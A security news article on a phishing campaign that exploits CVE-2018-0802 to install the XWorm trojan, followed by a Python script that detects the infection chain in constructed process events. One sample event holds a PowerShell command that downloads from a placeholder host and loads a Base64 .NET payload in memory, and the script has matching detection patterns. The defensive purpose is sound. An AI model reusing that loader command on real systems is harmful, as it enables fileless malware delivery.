
Phishing campaign spreads XWorm trojan using legacy Office flaw

Attackers are exploiting an older Microsoft Office vulnerability to deliver full remote control malware to enterprise systems.

What happened

A cyber espionage campaign is spreading the remote access trojan XWorm through business-themed phishing emails that exploit CVE-2018-0802, a remote code execution flaw in Microsoft Equation Editor. According to CyberPress, the emails impersonate purchase orders, shipment notices, and payment confirmations and encourage recipients to open a malicious Excel add-in. The file contains a hidden Object Linking and Embedding (OLE) component, a Windows feature used to embed content between documents, which triggers the vulnerable legacy Equation Editor when the file is opened. The exploit runs hidden code that downloads an HTML Application file and launches a multi-stage infection process that installs XWorm version 7.2, giving attackers full remote control of infected Windows systems.

Going deeper

The infection chain uses “fileless” techniques designed to avoid leaving detectable files on a system. After exploitation, malicious code retrieves and runs an HTA file, a type of Windows script application, using built-in system tools. The script then launches PowerShell to download what appears to be an image file; in reality it contains a Base64-encoded .NET malware component, meaning the malicious code is hidden inside encoded data. Rather than being saved to the hard drive, the component is loaded directly into memory to bypass traditional file-based antivirus detection. The final payload, XWorm, is injected into a legitimate MSBuild.exe process using a technique known as process hollowing, where attackers replace the memory of a trusted program with malicious code while keeping its legitimate name. Once running, XWorm connects to an attacker-controlled command server, encrypts communications using AES encryption, and registers the infected device for remote control.

What was said

Researchers cited in a February 16, 2026 CyberPress report warned that outdated software components continue to expose organizations to avoidable risk. Security experts stated, “Security experts recommend turning off legacy Office components, applying patches, and treating unexpected attachments with caution. Even a single open document can give attackers complete control of a system within minutes,” referring to exploitation of the vulnerability tracked as CVE-2018-0802.

In the know

According to Microsoft, XWorm is a remote access trojan distributed through a malware-as-a-service model and linked to the ClickFix campaign. The malware spreads primarily through phishing emails containing malicious links or attachments and allows attackers to steal sensitive information, hijack MetaMask cryptocurrency wallets and Telegram sessions, and monitor activity on infected Windows devices. Once installed, XWorm establishes persistence through system startup entries, hides its components using obfuscation techniques to avoid detection, and communicates with attacker-controlled command and control servers to receive instructions and transmit stolen data.

The big picture

Exploitation of CVE-2018-0802 is not new, yet federal authorities continue to classify it as an actively exploited vulnerability. The Cybersecurity and Infrastructure Security Agency maintains CVE-2018-0802 in its Known Exploited Vulnerabilities Catalog, identifying it as a flaw that threat actors continue to weaponize in real-world intrusions. Continued abuse of this Equation Editor vulnerability shows how legacy software components remain embedded in enterprise environments long after patches are available.

FAQs

Why is CVE-2018-0802 still effective years after disclosure?

Many systems retain outdated Equation Editor components that were not fully removed or patched, allowing attackers to exploit the vulnerability even in otherwise modern environments.

What is process hollowing?

Process hollowing is a technique where malicious code replaces the memory of a legitimate running process, allowing malware to execute under a trusted process name.

What makes XWorm particularly dangerous?

XWorm provides full remote access, supports encrypted command-and-control communications, and includes a plugin architecture that can extend functionality to credential theft, surveillance, ransomware deployment, and distributed denial-of-service activity.

Why are phishing attachments still effective in enterprise environments?

Business-themed emails that resemble routine operational documents can bypass user suspicion, especially when combined with exploits that trigger automatically upon opening.

What mitigation steps reduce exposure to legacy Office exploits?

Organizations can remove outdated Office components, ensure timely patch management, disable unnecessary OLE functionality, restrict execution of HTA files, and monitor for suspicious PowerShell and process injection behavior.
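The monitoring step in this answer, applied to the process chain described under "Going deeper" (Equation Editor spawning mshta.exe, mshta.exe spawning PowerShell, PowerShell decoding a Base64-wrapped .NET payload in memory, and MSBuild.exe being started by a script host), as an added detection example. This is not code from the article, CyberPress, Microsoft or Paubox; the event field names, rule names and every sample event are constructed for the illustration, and the URLs use the reserved .invalid domain as placeholders.

```python
"""
Detection logic for the process chain described in the article, run over
constructed Sysmon-style process-creation events (parent image, image,
command line). Each rule covers one stage; several stages in one event set
is the signal an analyst would escalate.
"""
import ntpath
import re
from typing import Callable, Dict, List, Set, Tuple

Event = Dict[str, str]

SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Constructed events (assumption): indexes 0-3 model the chain from the article,
# indexes 4-5 are benign noise a detector must not flag.
SAMPLE_EVENTS: List[Event] = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": "EQNEDT32.EXE -Embedding"},
    {"parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://stage.invalid/order.hta"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell.exe -w hidden -ep bypass -c \"$p=(New-Object Net.WebClient)"
                 ".DownloadString('http://stage.invalid/logo.png');"
                 "[Reflection.Assembly]::Load([Convert]::FromBase64String($p))\"")},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": "EXCEL.EXE Q3-report.xlsx"},
    {"parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": "MSBuild.exe app.csproj"},
]


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path, regardless of the host OS."""
    return ntpath.basename(path).lower()


def office_spawns_equation_editor(ev: Event) -> bool:
    # An Office app launching the legacy Equation Editor is the exploit trigger.
    return _base(ev["parent"]) in OFFICE_APPS and _base(ev["image"]) == "eqnedt32.exe"


def equation_editor_spawns_child(ev: Event) -> bool:
    # Equation Editor renders formulas; it has no legitimate reason to start processes.
    return _base(ev["parent"]) == "eqnedt32.exe"


def mshta_spawns_powershell(ev: Event) -> bool:
    # The HTA stage handing off to PowerShell.
    return _base(ev["parent"]) == "mshta.exe" and _base(ev["image"]) in POWERSHELL


_B64 = re.compile(r"FromBase64String", re.I)
_LOAD = re.compile(r"Reflection\.Assembly\]?::Load|DownloadString|DownloadData|WebClient|Invoke-WebRequest", re.I)


def powershell_inmemory_dotnet_load(ev: Event) -> bool:
    # Download, Base64 decode and Assembly.Load on one command line: the
    # "image that is really a .NET payload" step, never written to disk.
    if _base(ev["image"]) not in POWERSHELL:
        return False
    return bool(_B64.search(ev["cmdline"]) and _LOAD.search(ev["cmdline"]))


def msbuild_from_script_host(ev: Event) -> bool:
    # MSBuild.exe is normally started by an IDE or build tool, not by a script host
    # or Office app; an odd parent is the visible side of the process-hollowing step.
    return _base(ev["image"]) == "msbuild.exe" and _base(ev["parent"]) in SCRIPT_HOSTS | OFFICE_APPS


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("office_spawns_equation_editor", office_spawns_equation_editor),
    ("equation_editor_spawns_child", equation_editor_spawns_child),
    ("mshta_spawns_powershell", mshta_spawns_powershell),
    ("powershell_inmemory_dotnet_load", powershell_inmemory_dotnet_load),
    ("msbuild_from_script_host", msbuild_from_script_host),
]


def evaluate(events: List[Event]) -> List[Dict[str, object]]:
    """Return one hit per (event, rule) pair that fires."""
    hits: List[Dict[str, object]] = []
    for idx, ev in enumerate(events):
        for name, pred in RULES:
            if pred(ev):
                hits.append({"index": idx, "rule": name, "image": _base(ev["image"])})
    return hits


def chain_stages(events: List[Event]) -> Set[str]:
    """Distinct stages of the described chain observed in the event set."""
    return {str(h["rule"]) for h in evaluate(events)}


def looks_like_chain(events: List[Event], min_stages: int = 3) -> bool:
    """Escalate when several distinct stages appear together, not on a lone hit."""
    return len(chain_stages(events)) >= min_stages


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(f"event {hit['index']}: {hit['rule']} ({hit['image']})")
    print("chain detected:", looks_like_chain(SAMPLE_EVENTS))
```

Each rule on its own produces some noise (a developer's PowerShell build script can legitimately start MSBuild.exe), which is why `looks_like_chain` counts distinct stages rather than alerting on any single hit; the Equation Editor rules are the exception, since a patched or removed EQNEDT32.EXE should never appear as a parent process at all.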
